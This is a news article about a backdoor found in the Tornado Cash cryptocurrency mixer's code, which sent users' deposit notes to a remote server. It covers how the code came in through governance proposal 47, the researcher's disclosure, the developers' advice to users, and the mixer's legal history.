Researcher Finds Backdoor in Tornado Cash Code
A malicious JavaScript backdoor was discovered in the code of the cryptocurrency mixer Tornado Cash, which for nearly two months transmitted deposit note data to a remote server. Deposit notes function like private keys for funds that have passed through the mixer and can be used to regain access to assets even after they have been “mixed.” This backdoor threatens the privacy and security of all operations conducted via IPFS (since January 1, 2024), including services like ipfs.io, cf-ipfs.com, and eth.link.
How the Backdoor Was Introduced
Reports indicate that the malicious code was introduced two months ago through governance proposal number 47 by an individual or group known as Butterfly Effects, believed to be a community developer. The issue was first identified by a researcher using the alias Gas404, and later confirmed by the founder of SlowMist, a company specializing in blockchain security. In his report, Gas404 urged all stakeholders to quickly veto the malicious governance proposal.
Technical Details and Developer Response
According to Gas404, the malicious functionality encodes private deposit notes to make them appear as regular blockchain transaction data and conceals the use of the window.fetch function. Tornado Cash developers have confirmed the compromise and warned users about the risks, advising them to withdraw their old, potentially compromised deposit notes and replace them with newly generated ones. Additionally, users are strongly encouraged to revoke their votes for governance proposal 47 to roll back the changes and remove the malicious code.
Background on Tornado Cash
Tornado Cash is an open-source, decentralized mixer on the Ethereum blockchain. It uses a cryptographic zero-knowledge system called SNARKs (Zero-Knowledge Succinct Non-Interactive Argument of Knowledge) to allow users to deposit and withdraw funds anonymously.
Legal Issues and Aftermath
In 2022, U.S. authorities accused Tornado Cash of money laundering and imposed sanctions on the project, a move that was unpopular among many in the cryptocurrency industry. In 2023, the project’s founders were charged with helping criminals launder over $1 billion in stolen cryptocurrency. As a result, the original Tornado Cash ceased operations, but its codebase continues to be used for new shadow mixer services.